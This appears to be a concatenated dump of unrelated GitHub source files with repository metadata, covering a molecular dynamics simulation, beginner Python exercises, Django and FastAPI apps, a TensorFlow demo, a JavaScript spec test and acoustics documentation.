for i in particle_coords:
y_pos_particle_1.append(i[1])
y_pos_particle_1 = np.array(y_pos_particle_1)
x_velocity = []
for i in velocities:
x_velocity.append(i[0])
x_velocity = np.array(x_velocity)
y_velocity = []
for i in velocities:
y_velocity.append(i[1])
y_velocity = np.array(y_velocity)
x_pos_particle_2 = []
for i in range(len(x_pos_particle_1)):
new_x_position = (x_pos_particle_1[i] + x_velocity[i]*dt + (0.5*force_x[i]*(dt**2))/m)%lx
x_pos_particle_2.append(new_x_position)
y_pos_particle_2 = []
for i in range(len(y_pos_particle_1)):
new_y_position = (y_pos_particle_1[i] + y_velocity[i]*dt + (0.5*force_y[i]*(dt**2))/m)%lx
y_pos_particle_2.append(new_y_position)
#===================================================================================================================
#ALL BETWEEN THE EQUALS SIGNS NEEDS TO BE PUT IN A WHILE LOOP TO ITERATE OVER IT
#have a look at the puesdocode but this is the first stage we need to put in a loop
counter = 2 #this is because we have already calculated the first couple of positions before, so technically the first run of the loop is on the third time step
#this is a frequency counter asked for in the paper
f_log = 20
while counter < num_time_steps:
positions_array_for_force_calc = np.array((x_pos_particle_2, y_pos_particle_2)).T
force_x = np.zeros(number_particles)
force_y = np.zeros(number_particles)
for i in range(number_particles):
for j in range(i+1, number_particles):
atom1 = positions_array_for_force_calc[i]
atom2 = positions_array_for_force_calc[j]
#boundary conditions
#distance in the x coords of atoms
dx = atom1[0] - atom2[0]
#distance in the y coords of atoms
dy = atom1[1] - atom2[1]
#if the value of dx is smaller when we pass it through the boundary then change it
if lx - dx%lx < dx:
dx = abs(lx-(dx%lx))
#same witht eh y condition
if lx - dy%lx < dy:
dy = abs((lx-(dy%lx)))
#if the radius is smaller than the cut off (lennard jones potential is basically 0 after 2.5)
if ((dx**2) + (dy**2))**0.5 < r_cutoff:
r = (dx**2 + dy**2)**0.5
#differential of lennard jones potential
F = -4*epsilon*(((12*(sigma**12))/r**13) - (((alpha*6*(sigma**6))/r**7)))
#unit values for each direction so we can seperate force into x and y units in the list.
x_unit = (atom1[0]-atom2[0])/r
y_unit = (atom1[1]-atom2[1])/r
force_x[i] += F*x_unit
force_y[i] += F*y_unit
force_x[j] -= F*x_unit
force_y[j] -= F*y_unit
#below is to check whether the sum of the forces are roughly = 0
# =============================================================================
# x = sum(force_x) + sum(force_y)
# print('the sum of the forces is ', + x)
# =============================================================================
#then we will use this function to calculate the new positions based off the 2 previous lists.
x_pos_particle_3 = []
y_pos_particle_3 = []
for i in range(number_particles):
new_x_position = (2*x_pos_particle_2[i] - x_pos_particle_1[i] + (force_x[i]/m)*(dt**2))%lx
x_pos_particle_3.append(new_x_position)
new_y_position = (2*y_pos_particle_2[i] - y_pos_particle_1[i] + (force_y[i]/m)*(dt**2))%lx
y_pos_particle_3.append(new_y_position)
#then we create the new velocity
for i in range(number_particles):
new_velocity_x = (x_pos_particle_3[i] - x_pos_particle_1[i])/(2*dt)
x_velocity[i] = new_velocity_x
new_velocity_y = (y_pos_particle_3[i] - y_pos_particle_1[i])/(2*dt)
y_velocity[i] = new_velocity_y
#kinetic energy of the system
sum_velocity_x = 0
for i in x_velocity:
sum_velocity_x += i**2
sum_velocity_y = 0
for i in y_velocity:
sum_velocity_y += i**2
total_kinetic = 0.5*m*((sum_velocity_x + sum_velocity_y))
#temperature for the system
boltzmann = 1.0
#euqation for temperature of a system
T_new = (2*total_kinetic)/(3*boltzmann)
#potential energy of the system
potential_energy = 0
for i in range(number_particles):
for j in range(number_particles):
if i == j:
continue
else:
atom1 = positions_array_for_force_calc[i]
atom2 = positions_array_for_force_calc[j]
#boundary conditions
#distance in the x coords of atoms
dx = atom1[0] - atom2[0]
#distance in the y coords of atoms
dy = atom1[1] - atom2[1]
#if the value of dx is smaller when we pass it through the boundary then change it
if lx - dx%lx < dx:
dx = abs(lx-(dx%lx))
#same witht eh y condition
if lx - dy%lx < dy:
dy = abs((lx-(dy%lx)))
#if the radius is smaller than the cut off (lennard jones potential is basically 0 after 2.5)
if ((dx**2) + (dy**2))**0.5 < r_cutoff:
r = (dx**2 + dy**2)**0.5
#equation for lennard jones potential energy
U_potential = 4*epsilon*((sigma/r)**12 - alpha*((sigma/r)**6))
potential_energy += U_potential
#total energy of the system
total_energy = total_kinetic + potential_energy
counter += 1
if counter%f_log == 0:
print('KE =', total_kinetic)
print('PE =', potential_energy)
print('Total Energy =', total_kinetic + potential_energy)
print('The new Temperature of the system is', T_new)
#then we need to reassign the names of the lists so they get iterated between over and over again. Thi is a long winded way so i understand what is going on.
oldest_x = x_pos_particle_1
old_x = x_pos_particle_2
not_old_x = x_pos_particle_3
oldest_x = []
oldest_x = old_x
old_x = not_old_x
x_pos_particle_1 = oldest_x
x_pos_particle_2 = old_x
oldest_y = y_pos_particle_1
old_y = y_pos_particle_2
not_old_y = y_pos_particle_3
oldest_y = []
oldest_y = old_y
old_y = not_old_y
y_pos_particle_1 = oldest_y
y_pos_particle_2 = old_y
#===================================================================================================================
#this sets up our scatter plot which will show the initial state of the particles, this may need to change soon though as the particles evolve.
x = array_particle_coords[:,0]
y = array_particle_coords[:,1]
plt.plot(x,y, 'o')
| [
"noreply@github.com"
] | Armad1ll0.noreply@github.com |
d31d05836e122f1201a45888d38ad9e2b8ef9725 | 4348c47ca6f28ac6d403bfdcccd4001861d0959e | /functionloopbasic2.py | 15ee6f0af5fbb834d53d981104d45574d99487af | [] | no_license | elephantebae/PythonStack | 26d9e6488ccb4aa80e3a9d35d3e95b3715793a50 | 6f6f5bf8b620793bf8680ed106869ed9661f59d3 | refs/heads/master | 2020-04-08T14:46:10.634128 | 2018-11-28T05:57:33 | 2018-11-28T05:57:33 | 159,451,024 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,123 | py | # Biggie Size - Given a list, write a function that changes all positive numbers in the list to "big".
# Example: biggie_size([-1, 3, 5, -5]) returns that same list, but whose values are now [-1, "big", "big", -5]
# def biggie_size(a):
# for num in range(0,len(a),1):
# if a[num] > 0:
# a[num] = "big"
# print(a)
# biggie_size([-1, 3, 5, -5])
# Count Positives - Given a list of numbers, create a function to replace the last value with the number of positive values. (Note that zero is not considered to be a positive number).
# Example: count_positives([-1,1,1,1]) changes the original list to [-1,1,1,3] and returns it
# Example: count_positives([1,6,-4,-2,-7,-2]) changes the list to [1,6,-4,-2,-7,2] and returns it
# def count_positives(a):
# count = 0
# for num in range(0, len(a) ,1):
# if a[num] > 0:
# count += 1
# a[len(a)-1] = count
# return a
# print(count_positives([1,6,-4,-2,-7,-2]))
# Sum Total - Create a function that takes a list and returns the sum of all the values in the array.
# Example: sum_total([1,2,3,4]) should return 10
# Example: sum_total([6,3,-2]) should return 7
# def sum_total(a):
# sum = 0
# for num in range(0, len(a), 1):
# sum += a[num]
# return sum
# print (sum_total([6,3,-2]))
# Average - Create a function that takes a list and returns the average of all the values.
# Example: average([1,2,3,4]) should return 2.5
# def average(a):
# sum = 0
# for num in range(0,len(a), 1):
# sum += a[num]
# return sum/len(a)
# print (average([1,2,3,4]))
# Length - Create a function that takes a list and returns the length of the list.
# Example: length([37,2,1,-9]) should return 4
# Example: length([]) should return 0
# def length(a):
# return len(a)
# print(length([37,2,1,-9]))
# Minimum - Create a function that takes a list of numbers and returns the minimum value in the list. If the list is empty, have the function return False.
# Example: minimum([37,2,1,-9]) should return -9
# Example: minimum([]) should return False
# def minimum(a):
# if len(a) == 0:
# return False
# min = a[0]
# for num in range(0, len(a), 1):
# if a[num] < min:
# min = a[num]
# return min
# print(minimum([37,2,1,-9]))
# print(minimum([]))
# Maximum - Create a function that takes a list and returns the maximum value in the array. If the list is empty, have the function return False.
# Example: maximum([37,2,1,-9]) should return 37
# Example: maximum([]) should return 0
# def maximum(a):
# if len(a) == 0:
# return False
# max = a[0]
# for num in range(0,len(a),1):
# if a[num] > max:
# max = a[num]
# return max
# print(maximum([37,2,1,-9]))
# print(maximum([]))
# Ultimate Analysis - Create a function that takes a list and returns a dictionary that has the sumTotal, average, minimum, maximum and length of the list.
# Example: ultimate_analysis([37,2,1,-9]) should return {'sumTotal': 31, 'average': 7.75, 'minimum': -9, 'maximum': 37, 'length': 4 }
def ultimate_analysis(a):
mydict = {'sumTotal': 0, 'average':0, 'minimum':0, 'maximum':0, 'length':0}
for num in range(0,len(a),1):
mydict['sumTotal'] += a[num]
mydict['length'] = len(a)
if mydict['minimum'] > a[num]:
mydict['minimum'] = a[num]
if mydict['maximum'] < a[num]:
mydict['maximum'] = a[num]
mydict['average'] = mydict['sumTotal']/mydict['length']
return mydict
print(ultimate_analysis([37,2,1,-9]))
# Reverse List - Create a function that takes a list and return that list with values reversed. Do this without creating a second list.
# (This challenge is known to appear during basic technical interviews.)
# Example: reverse_list([37,2,1,-9]) should return [-9,1,2,37]
# def reverse_list(a):
# temp = 0
# count = 0
# for num in range(0,(len(a)-1)//2, 1):
# temp= a[num]
# a[num] = a[(len(a)-1)-count]
# a[(len(a)-1)-count] = temp
# count += 1
# return a
# print (reverse_list([37,2,1,-9])) | [
"paul.bae.j@gmail.com"
] | paul.bae.j@gmail.com |
2f9e3f9b1f607d3f89fc3e056f19fcccad2f74fe | 28a462a28f443c285ca5efec181ebe36b147c167 | /tests/compile/basic/recent/String.prototype.startsWith.spec | ba62e090c26d2ee9be97ca1a97a2010796ad2856 | [
"BSD-3-Clause",
"BSD-2-Clause"
] | permissive | kaist-plrg/jstar | 63e71f9156860dc21cccc33a9f6c638dfee448ea | 1282919127ea18a7e40c7a55e63a1ddaaf7d9db4 | refs/heads/main | 2022-07-22T08:12:34.947712 | 2022-02-27T04:19:33 | 2022-02-27T11:06:14 | 384,045,526 | 6 | 4 | NOASSERTION | 2022-02-27T11:05:26 | 2021-07-08T07:53:21 | Python | UTF-8 | Python | false | false | 884 | spec | 1. Let _O_ be ? RequireObjectCoercible(*this* value).
1. Let _S_ be ? ToString(_O_).
1. Let _isRegExp_ be ? IsRegExp(_searchString_).
1. If _isRegExp_ is *true*, throw a *TypeError* exception.
1. Let _searchStr_ be ? ToString(_searchString_).
1. Let _len_ be the length of _S_.
1. If _position_ is *undefined*, let _pos_ be 0; else let _pos_ be ? ToIntegerOrInfinity(_position_).
1. Let _start_ be the result of clamping _pos_ between 0 and _len_.
1. Let _searchLength_ be the length of _searchStr_.
1. If _searchLength_ = 0, return *true*.
1. Let _end_ be _start_ + _searchLength_.
1. If _end_ > _len_, return *false*.
1. Let _substring_ be the substring of _S_ from _start_ to _end_.
1. Return ! SameValueNonNumeric(_substring_, _searchStr_). | [
"h2oche22@gmail.com"
] | h2oche22@gmail.com |
b4476bd184b08f4a534601ef4b8fc636735e8681 | d4d048ca450a25300912b083ec0010826b19d1b6 | /django/Courses/apps/courses/views.py | c02ab4b527e84168b54170a9ce78c3433fccbc64 | [] | no_license | codexnubes/Coding_Dojo | dfb4815bf7d21292f45e03e7dde5249f65734828 | 9259f465bc24c44e4c8d7bcfd93b5349ca7948ec | refs/heads/master | 2021-01-12T05:59:59.464600 | 2016-12-19T17:16:50 | 2016-12-19T17:16:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,302 | py | from django.shortcuts import render, redirect
from models import Courses, Descriptions
# Create your views here.
def index(request):
show_data = Descriptions.objects.select_related()
context = {'data': show_data}
print show_data.query
return render(request,
'courses/index.html', context)
def add(request):
if request.method == 'POST':
course_name = request.POST['name']
description_post = request.POST['description']
if course_name == "" or description_post == "":
return redirect('/')
c = Courses(name = course_name)
c.save()
d = Descriptions(description = description_post, course = c)
d.save()
return redirect('/')
def remove(request, course_id):
if request.method == "GET":
show_data = Descriptions.objects.get(course = course_id)
print id, "get request"
context = {"course_id": course_id,
"data": show_data}
return render(request,
'courses/remove.html', context)
elif request.method == "POST":
c = Courses.objects.get(id = course_id)
d = Descriptions.objects.get(course = c)
d.delete()
c.delete()
print c
print d
print course_id, "POST request"
return redirect('/')
| [
"ameyers@flowroute.com"
] | ameyers@flowroute.com |
1106a0f39febeab1ad45a61a9a231f43c6ca3343 | 83e9d40f37e0805d21c99450f7f6a469c39411cc | /blog/migrations/0002_post_slug.py | 146a12dc7305a9e03c9580c4fadbe83945b3a6b4 | [] | no_license | rahulvashistha/blog-project-drf | 30d216fc02b640af41c0060e6048b16d86bd9d87 | 93845578e5a4ba05e8eb5d3168296c364fc7af6d | refs/heads/main | 2023-08-18T07:15:43.506873 | 2021-09-29T06:54:38 | 2021-09-29T06:54:38 | 411,560,496 | 1 | 0 | null | 2021-09-29T06:45:39 | 2021-09-29T06:45:38 | null | UTF-8 | Python | false | false | 415 | py | # Generated by Django 3.2.6 on 2021-08-19 06:21
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('blog', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='post',
name='slug',
field=models.CharField(default='', max_length=140),
preserve_default=False,
),
]
| [
"rahul@technoarchsoftwares.com"
] | rahul@technoarchsoftwares.com |
18a541eb199a366a26985dc3e4063e252c7cb77b | 614fd71ba186129705a82c8f2650c76e4f9dbae0 | /book/migrations/0002_auto_20210307_0538.py | 9c72d4b78e06279c844702147613f31a0f64cbf3 | [] | no_license | marlinbleriaux/kmbbook | b736cdca88a532f75046ad6fe1fd395cbf01c075 | 8871fded38a9e7d4a30ac573ba06c0eb7ade4fd7 | refs/heads/master | 2023-03-18T22:06:06.800353 | 2021-03-13T15:54:08 | 2021-03-13T15:54:08 | 347,408,217 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,063 | py | # Generated by Django 3.1.5 on 2021-03-07 04:38
import datetime
from django.db import migrations, models
import django.db.models.deletion
from django.utils.timezone import utc
class Migration(migrations.Migration):
dependencies = [
('book', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Campus',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('nom', models.CharField(max_length=30)),
('adresse_postale', models.CharField(max_length=60)),
],
),
migrations.CreateModel(
name='Cursus',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('intitule', models.CharField(max_length=30)),
],
),
migrations.CreateModel(
name='Faculte',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('nom', models.CharField(max_length=30)),
('couleur', models.CharField(max_length=6)),
],
),
migrations.CreateModel(
name='Fonction',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('intitule', models.CharField(max_length=30)),
],
),
migrations.AddField(
model_name='personne',
name='amis',
field=models.ManyToManyField(related_name='_personne_amis_+', to='book.Personne'),
),
migrations.AddField(
model_name='personne',
name='courriel',
field=models.EmailField(default=datetime.datetime(2021, 3, 7, 4, 37, 16, 818888, tzinfo=utc), max_length=254),
preserve_default=False,
),
migrations.AddField(
model_name='personne',
name='date_de_naissance',
field=models.DateField(default=datetime.datetime(2021, 3, 7, 4, 37, 48, 905611, tzinfo=utc)),
preserve_default=False,
),
migrations.AddField(
model_name='personne',
name='id',
field=models.AutoField(auto_created=True, default=1),
preserve_default=False,
),
migrations.AddField(
model_name='personne',
name='matricule',
field=models.CharField(default=datetime.datetime(2021, 3, 7, 4, 38, 22, 324372, tzinfo=utc), max_length=10),
preserve_default=False,
),
migrations.AddField(
model_name='personne',
name='nom',
field=models.CharField(default=datetime.datetime(2021, 3, 7, 4, 38, 26, 883722, tzinfo=utc), max_length=30),
preserve_default=False,
),
migrations.AddField(
model_name='personne',
name='prenom',
field=models.CharField(default=datetime.datetime(2021, 3, 7, 4, 38, 31, 275136, tzinfo=utc), max_length=30),
preserve_default=False,
),
migrations.CreateModel(
name='Message',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('contenu', models.TextField()),
('date_de_publication', models.DateField()),
('auteur', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='book.personne')),
],
),
migrations.CreateModel(
name='Etudiant',
fields=[
('personne_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='book.personne')),
('annee', models.IntegerField()),
('cursus', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='book.cursus')),
],
bases=('book.personne',),
),
migrations.CreateModel(
name='Employe',
fields=[
('personne_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='book.personne')),
('bureau', models.CharField(max_length=30)),
('campus', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='book.campus')),
('fonction', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='book.fonction')),
],
bases=('book.personne',),
),
migrations.AddField(
model_name='personne',
name='faculte',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='book.fonction'),
preserve_default=False,
),
]
| [
"bleriaux@gmail.com"
] | bleriaux@gmail.com |
9d0b0a941398fd991247b3a0ec96412244d364c5 | 30fe7671b60825a909428a30e3793bdf16eaaf29 | /.metadata/.plugins/org.eclipse.core.resources/.history/9a/f0d15008ccf800161174a93fd5908e78 | 96f863b8b89de32901e8cf640c731bc4ebefeb38 | [] | no_license | abigdream84/PythonStudy | 0fc7a3b6b4a03a293b850d0ed12d5472483c4fb1 | 059274d3ba6f34b62ff111cda3fb263bd6ca8bcb | refs/heads/master | 2021-01-13T04:42:04.306730 | 2017-03-03T14:54:16 | 2017-03-03T14:54:16 | 79,123,274 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 983 | #!/usr/bin/env python
#coding:UTF-8
from audit_demo.utility.MySqlHelper import MySqlHelper
class g_table(object):
def __init__(self):
self.__helper = MySqlHelper()
def add_grp(self,gpname):
sql = 'insert into g_table(g_name) values(%s)'
try:
self.__helper.insert(sql,gpname)
return True
except Exception as e:
print(e)
return False
def get_grp(self,gpname):
sql = 'select g_name from g_table where g_name = %s'
try:
g_id = self.__helper.select(sql,gpname)
except Exception as e:
print(e)
return g_id
def upd_grp(self,g_name_old,g_name_new):
sql = 'update g_table set g_name = %s where g_name = %s'
params = (g_name_new, g_name_old)
try:
self.__helper.update(sql,params)
except Exception as e:
print(e)
t=g_table()
t.add_grp('gp1')
| [
"abigdream@hotmail.com"
] | abigdream@hotmail.com | |
d78e9b91414cf74ab0da36fd5f6de8f911a9e0cd | 53eee7eb899cb518983008532257037fb89def13 | /2579.count-total-number-of-colored-cells.py | eb2d7d5de90aeac6f2c95bbec4eef4b247461260 | [] | no_license | chenxu0602/LeetCode | 0deb3041a66cb15e12ed4585bbe0fefce5dc6b26 | 3dc5af2bc870fcc8f2142130fcd2b7cab8733151 | refs/heads/master | 2023-07-05T19:26:21.608123 | 2023-07-02T08:35:35 | 2023-07-02T08:35:35 | 233,351,978 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 273 | py | #
# @lc app=leetcode id=2579 lang=python3
#
# [2579] Count Total Number of Colored Cells
#
# @lc code=start
class Solution:
def coloredCells(self, n: int) -> int:
# return n * n + (n - 1) * (n - 1)
return 2 * n * (n - 1) + 1
# @lc code=end
| [
"chenxu@MacBook-Pro.local"
] | chenxu@MacBook-Pro.local |
9676213e2d375101f59dd6bab0489d7659d49416 | f0d0e106204190927a3c2260f7d48e5c3dfa2896 | /general/plugins/keywords/greetings.py | 77af8574abc5a90df7bfcfe2aca1ed90a1f9662f | [
"MIT"
] | permissive | asagarasu/bungo-bot-DEPRECATED | 4d36c02ce57a1ced94581ad0600289686982d045 | e628d99ac3e1558f2214aebf22eff772a7d2e70c | refs/heads/master | 2022-11-26T12:42:39.437671 | 2020-08-05T03:16:42 | 2020-08-05T03:16:42 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,513 | py | from nonebot import on_command, CommandSession
from nonebot import on_natural_language, NLPSession, IntentCommand
from .data_source import *
from ...plugins import utils
# good morning
@on_command('morning', only_to_me=False)
async def morning(session: CommandSession):
data = await utils.load_keywords_data('greetings')
msg_morning = data['morning']
user = session.get('user')
msg_is_morning = await get_is_morning(msg_morning, user)
nickname = await utils.get_display_name(session)
msg = nickname + msg_is_morning
await session.send(msg)
@on_natural_language(keywords={'早安', '早上好'}, only_to_me=False)
async def _(session: NLPSession):
if session.event['to_me'] or utils.get_random_boolean(50):
return IntentCommand(100.0, 'morning')
# good night
@on_command('night', only_to_me=False)
async def night(session: CommandSession):
data = await utils.load_keywords_data('greetings')
msg_night = data['night']
user = session.get('user')
msg_is_night = await get_is_night(msg_night, user)
nickname = await utils.get_display_name(session)
msg = nickname + msg_is_night
await session.send(msg)
@on_natural_language(keywords={'晚安', '睡了'}, only_to_me=False)
async def _(session: NLPSession):
if session.event['to_me'] or utils.get_random_boolean(50):
return IntentCommand(100.0, 'night')
@morning.args_parser
@night.args_parser
async def _(session: CommandSession):
session = await utils.get_stated_session(session) | [
"yl668@cornell.edu"
] | yl668@cornell.edu |
de6c5c452f1a03fca9ef09e22250daceffcb4371 | 84c9a26a3fe11b79a5d326faf1bd2ddc43939d1a | /4 - Largest Palindrome Product.py | 2f5f06f759a2523231b1b690a98ce8ffed35d653 | [] | no_license | Fabhi/Project-Euler | 14be3bdd52f29980b1f0091c1399fac5b4d1c484 | 63ed63092481a398e605b27f06ccb7ee06d8cea5 | refs/heads/master | 2021-05-25T17:22:50.669975 | 2020-04-10T07:36:53 | 2020-04-10T07:36:53 | 253,841,722 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 482 | py | # Problem 4 - Largest Palindrome Product
# https://projecteuler.net/problem=4
def brute(n):
min = 10**(n-1)
max = 10**n-1
largest =-1
for i in range(min, max+1):
for j in range(min ,max+1):
temp = i*j
if str(temp) == str(temp)[::-1] and temp>largest:
largest = temp
print(largest)
if __name__ == '__main__':
t = int(input().strip())
for a0 in range(t):
n = int(input().strip())
brute(n)
| [
"43674998+Fabhi@users.noreply.github.com"
] | 43674998+Fabhi@users.noreply.github.com |
8fd2aadeb4b360d6fcfac9121c8abd2d093c7905 | db3a6ce7f0a8a4fbda6a34f269c390b47b963ed7 | /week2/Lab1/Ex18.py | 184ad4617bc18bd500d46fd9aeb7509a76b3736d | [] | no_license | vchatchai/bootcamp-ai | 3de48b924cb9c87a2ddc0c2cdf2ba363bbf11381 | cbbce004a9596b688ee04cdb10600f335b66a4c4 | refs/heads/master | 2020-04-08T01:50:10.511395 | 2018-12-22T09:33:59 | 2018-12-22T09:33:59 | 158,911,025 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 404 | py | import tensorflow as tf
a = tf.Variable(2, name="scalar")
b = tf.Variable([2, 3], name="vector")
c = tf.Variable([[0, 1], [2, 3]], name="matrix")
W = tf.Variable(tf.zeros([784, 10]))
with tf.Session() as session:
writer = tf.summary.FileWriter('graphs_ex18', session.graph)
print(session.run(a))
print(session.run(b))
print(session.run(c))
print(session.run(W))
writer.close()
| [
"ee56054@gmail.com"
] | ee56054@gmail.com |
ee71aa08049ba4b1568dbc021cf751df09b669b7 | 5c073141a904824d97526cb7d5dbb996fbd86180 | /inagro_koordinasi_marketing/models/__init__.py | 786bf799cb30ebebb738bd2326741ea0b930fcce | [] | no_license | demodoo/inagro | 496eb5b52f200638b8153604e74aba37082b484f | 83af0baaff320e3620a9c2cf1ea871f59aab0c8f | refs/heads/master | 2022-04-10T04:38:26.745950 | 2020-03-19T09:42:12 | 2020-03-19T09:42:12 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 80 | py | # -*- coding: utf-8 -*-
from . import models
from . import koordinasi_marketing | [
"rachmadona@rocketmail.com"
] | rachmadona@rocketmail.com |
7ef2da970532f6c751389f8b00288f1291af4e4f | b40c5846605fc0b0456dd99bb5e214eaefb1a067 | /test.py | c8b4006a863e754e7f97b992892ad3300fda1538 | [] | no_license | daaaaaun/python_section2 | 6153767110559c4f1abac61d4022d107566737d5 | dc5eeb1d3e00c06c8b50909927b43da99e2e989b | refs/heads/master | 2020-05-15T11:03:44.816503 | 2019-04-23T01:45:49 | 2019-04-23T01:45:49 | 182,210,655 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 259 | py | from tkinter import *
def printHello() :
print('Hi')
root = Tk()
w = Label(root, text="Python Test")
b = Button(root, text="Hello Python", command=printHello)
c = Button(root, text="Quit", command=root.quit)
w.pack()
b.pack()
c.pack()
root.mainloop()
| [
"geeeeekirl@gmail.com"
] | geeeeekirl@gmail.com |
3c74be0064501659bed8cf392ce9d5f5ca0414a4 | bede337b5ee193bb5669c855b70a78d929dc5ae8 | /apps/one_password.py | ca9110f9a15ed7b774c7eb7f446788b5cfa0d019 | [
"0BSD"
] | permissive | dwiel/talon-user | ffe83c05e054626431fe12c14dbfe850950fa4c4 | 559617135408ea2ceafaef54564438405546f255 | refs/heads/master | 2020-09-12T22:58:36.575833 | 2019-11-19T17:12:05 | 2019-11-19T17:12:05 | 222,585,938 | 0 | 0 | NOASSERTION | 2019-11-19T02:00:20 | 2019-11-19T02:00:19 | null | UTF-8 | Python | false | false | 217 | py | from talon import ctrl
from talon.voice import Context, Key
from ..utils import text, delay
ctx = Context("1password")
ctx.keymap({
"password [<dgndictation>] [over]": [Key("shift-cmd-\\"), delay(0.2), text],
}) | [
"dwight.holman@workday.com"
] | dwight.holman@workday.com |
050f2631f6b47527fb3ebdc876e7b392d2199011 | 3ffb51fa2241cba9c9680ab01f8da4057861f849 | /collezione/migrations/0023_auto_20181102_1526.py | a6e5117963a13b170e60c828a4b8d205856cf3f5 | [] | no_license | mions1/Euros | a663d9e3a38de56c51091233e6b4fc6db3147fb2 | faa74139e178b2c9dc868a536518715bed91c676 | refs/heads/master | 2020-04-08T00:12:45.713416 | 2018-11-23T14:35:45 | 2018-11-23T14:35:45 | 158,842,175 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 755 | py | # Generated by Django 2.1.2 on 2018-11-02 15:26
from django.db import migrations, models
import django.utils.timezone
class Migration(migrations.Migration):
dependencies = [
('collezione', '0022_auto_20181030_2030'),
]
operations = [
migrations.AddField(
model_name='acquisto',
name='prezzo',
field=models.FloatField(default=0.0),
),
migrations.AlterField(
model_name='acquisto',
name='data',
field=models.DateField(default=django.utils.timezone.now),
),
migrations.AlterField(
model_name='possiede',
name='prezzo',
field=models.FloatField(default=0.0, null=True),
),
]
| [
"simone.mione1@gmail.com"
] | simone.mione1@gmail.com |
c2c993bd9480693f0aedbb0ebbc44370c176aa60 | b7263dff34b5ae90151494fa549b2c73164798be | /app/main.py | c9adc1eeb34540f06df3d3223acc4e908b180b66 | [] | no_license | FrankFacundo/StudyCaseTennis | 73e973c85db9f9749804adb875ecb838a7dd5b04 | 161f84fe8c28844b50e365f761ede35af5fdd3b6 | refs/heads/master | 2023-08-11T00:23:49.465525 | 2021-10-04T10:10:21 | 2021-10-04T10:10:21 | 413,368,750 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 566 | py | from fastapi import FastAPI
from fastapi.responses import Response
from pydantic import BaseModel
from .service import predict
ROOT_PATH = '/api/atp'
class PredictPayload(BaseModel):
player1: str
player2: str
app = FastAPI(root_path = ROOT_PATH)
@app.get('/')
async def health_check():
return Response(content='OK', status_code=200)
@app.post('/predict/')
async def handlerpredict(payload: PredictPayload):
prediction = predict(payload)
if prediction:
return "The winner is the player 2. "
return "The winner is the player 1. "
| [
"frank.f96@hotmail.com"
] | frank.f96@hotmail.com |
e15e6514b4d3e4de62be7407d959cb6a4af1cd0b | 4c5577b648b3505c7201ccb41de33866d300f92c | /venv/bin/chardetect | c9b0446b0a5ca36d2e8fd74974a6c6fa87dfc101 | [] | no_license | 9polymath/nine-app | 371e0c28102d3976f1ccd7e51251f49a50ea1ee0 | 62ed2c6638c7111c8375a0d8b98390b6ec57e265 | refs/heads/master | 2023-04-02T04:38:01.439184 | 2021-04-16T14:32:44 | 2021-04-16T14:32:44 | 358,627,508 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 262 | #!/Users/dolapoolaniawo/Desktop/nine-app/venv/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from chardet.cli.chardetect import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"43099885+Dolapola@users.noreply.github.com"
] | 43099885+Dolapola@users.noreply.github.com | |
3fba9be745d062af4a6987c3b56215f6fe18440e | 346f7dde9df3e0d72b5a9d78212f5f57db1678fd | /venv/Lib/site-packages/acoustics/atmosphere.py | 1e356059fa2af74773c328036a92793118629286 | [] | no_license | Kejzin/Thesis | b844d05488a259a1de5c2d347f3bed8ec0194a51 | cb148c09b1c3746c9aca58f86f0eecf7109a9b93 | refs/heads/master | 2022-01-07T22:48:28.458561 | 2019-07-16T13:15:43 | 2019-07-16T13:15:43 | 155,840,718 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,350 | py | """
Atmosphere
==========
The atmosphere module contains functions and classes related to atmospheric
acoustics and is based on :mod:`acoustics.standards.iso_9613_1_1993`.
Atmosphere class
****************
.. autoclass:: acoustics.atmosphere.Atmosphere
From ISO 9613-1 1993
********************
Constants
---------
.. autoattribute:: acoustics.standards.iso_9613_1_1993.SOUNDSPEED
.. autoattribute:: acoustics.standards.iso_9613_1_1993.REFERENCE_TEMPERATURE
.. autoattribute:: acoustics.standards.iso_9613_1_1993.REFERENCE_PRESSURE
.. autoattribute:: acoustics.standards.iso_9613_1_1993.TRIPLE_TEMPERATURE
Functions
---------
.. autofunction:: acoustics.standards.iso_9613_1_1993.soundspeed
.. autofunction:: acoustics.standards.iso_9613_1_1993.saturation_pressure
.. autofunction:: acoustics.standards.iso_9613_1_1993.molar_concentration_water_vapour
.. autofunction:: acoustics.standards.iso_9613_1_1993.relaxation_frequency_nitrogen
